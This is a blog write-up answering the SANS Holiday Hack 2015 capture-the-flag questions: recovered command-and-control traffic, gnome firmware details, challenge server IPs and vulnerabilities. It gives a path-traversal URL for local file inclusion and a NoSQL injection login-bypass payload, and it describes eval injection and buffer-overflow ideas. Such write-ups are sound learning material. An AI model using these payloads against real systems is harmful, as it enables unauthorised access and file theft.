Tuesday, January 5, 2016

SANS Holiday Hack 2015 Challenge 2015-Answers Attempt

1. What commands were sent over the gnome's command and control center?
(I'm not certain if this answer is correct.  I was looking at the DNS responses in the case.  I may've needed the DNS requests.)

EXEC:iwconfig
EXEC:START_STATEEXEC:wlan0
EXEC:lo
EXEC:eth0
EXEC:cat /tmp/iwlistscan.txt EXEC:STOP_STATENONE:NONE:NONE:NONE:FILE:/root/Pictures/snapshot_CURRENT.jpg FILE:START_STATE,NAME=/root/Pictures/snapshot_CURRENT.jpg


(I wasn't sure if the whole C&C transaction was required. I listed it later in this write-up.)

2. What image appears in the photo the Gnome sent across the channel from the Dosis' home?



3. What operating system and CPU type are being used in the Gnome? 

The operating system is OpenWrt. The CPU type is ARMx64.

3. What type of web framework is the Gnome web interface built in?

The web framework that the Gnome web interface is built in is Express web framework which is a Node.js type of framework.


4. What kind of a database engine is used to support the Gnome web interface?

The kind of database engine that is used to support the Gnome web interface is Mongo.


4. What is the password stored in the Gnome database?

The password stored in the Gnome database is SittingOnAShelf.


5. What are the IP Addresses of the five Super Gnomes scattered around the world, as verified by Tom Hessman in the Dosis neighborhood?

The IP Addresses of the five Super Gnomes scattered around the world, as verified by Tom Hessman are:
Super Gnome 1: 52.2.229.189
Super Gnome 2: 52.34.3.80

Super Gnome 3: 52.64.191.71 
Super Gnome 4: 52.192.152.132 
Super Gnome 5: 54.233.105.81

6. Where is each gnome located geographically? 

One gnome is located in Japan
One gnome is located in Australia.
One gnome is located in Brazil.

Two gnomes are located in the United States.

7. Please describe the vulnerabilities that you discovered in the Gnome firmware.

Every gnome except for Gnome 3 has the password reuse vulnerability.
The first gnome had a plain text password stored in the Gnome.0 Mongo database.
The second gnome's vulnerability was in the settings files upload feature and the cam viewer feature. The cam viewer feature introduces a local file inclusion vulnerability in the camera variable.
The third gnome has a flaw that allows one to bypass the login page.
The fourth gnome has image processing capability added to it. Unfortunately, in the files upload section, this image processing is sent to an “eval” statement, and the user input isn't sanitized. The only protection is a mime-type check, which can be bypassed.
The fifth gnome has a is vulnerable to attack via port 4242. There is a Super Gnome Status Server on that port. The first gnome had the source code for a service running on that port. I suspect that the sgstatd.c is vulnerable to a buffer overflow vulnerability or a frame pointer overwrite.

8.  Please describe how you exploited each vulnerability.

Super Gnome 1: One could simply log onto the IP Address at 52.2.229.189 using the username “admin” and password, “SittingOnAShelf”. The IP Address is in the etc/hosts file in the firmware.


Super Gnome 2: One could use the upload “filen” variable to create a directory that they had access to. One could create a directory that had a .png in the directory name to bypass the .png requirement in the camera viewer. Once the .png requirement was bypassed, whatever the cam viewer variable “camera”, was set to, was displayed to the screen. After creating a directory that had .png in it, and that one has access to, one could craft a url like the one below to access the directory and file that they wished to.

http://52.34.3.80/cam? camera=../../../../../../../gnome/www/public/upload/LUbQRcPB/abcde/bob.png/../../../../../../../gnome/ww w/files/gnome.conf

Super Gnome 3: One could use the username “admin” and have the password evaluate to true, by using the content-type:application/json. Then typing, “{“username”: “admin”, “password”: “{“$gt”: “”}” in the body of the POST message.

Super Gnome 4: One could put an SSJS injection in place of the postproc body POST request and can exploit the “eval” function. Eval takes strings as functions and executes them.

Super Gnome 5: I'm not certain how one would exploit this Super Gnome. I do notice that it is handling buffers and pointers to memory locations, though, and usually the pointers can be overwritten to point to whatever position in memory that the attacker wants to target via the buffer, hence the term, “buffer overflow vulnerability”. Canaries are used to help mitigate this problem, although they aren't always successful. There are ways to bypass them. This may actually require a frame pointer overwrite, which is different than a buffer overflow.

9.  What is the nefarious plot of the ATNAS corporation?

The nefarious plot of the ATNAS Corporation is outlined in the e-mail contained in Super Gnome 3. The nefarious plot is to rob everyone who owns a Gnome In Your Home on Christmas Eve.

10.  Who is the villain behind this plot?

It's Cindy Lou Who. In the e-mail contained in Super Gnome 3, the boss spells out the plan, the manner of speech is that of the Grinch. In the e-mail contained in Super Gnome 4, Cindy Lou Who explains that seeing the Grinch rob her home when she was about two traumatized her and caused her to hate the Christmas season. When one xors the camera images of factory_cam_1.png, factory_cam_2.png, factory_cam_3.png, factory_cam_4.png, and the camera_feed_overlap_error.png; one starts to notice a picture emerging. It appears to be Cindy Lou Who. 

No comments:

Post a Comment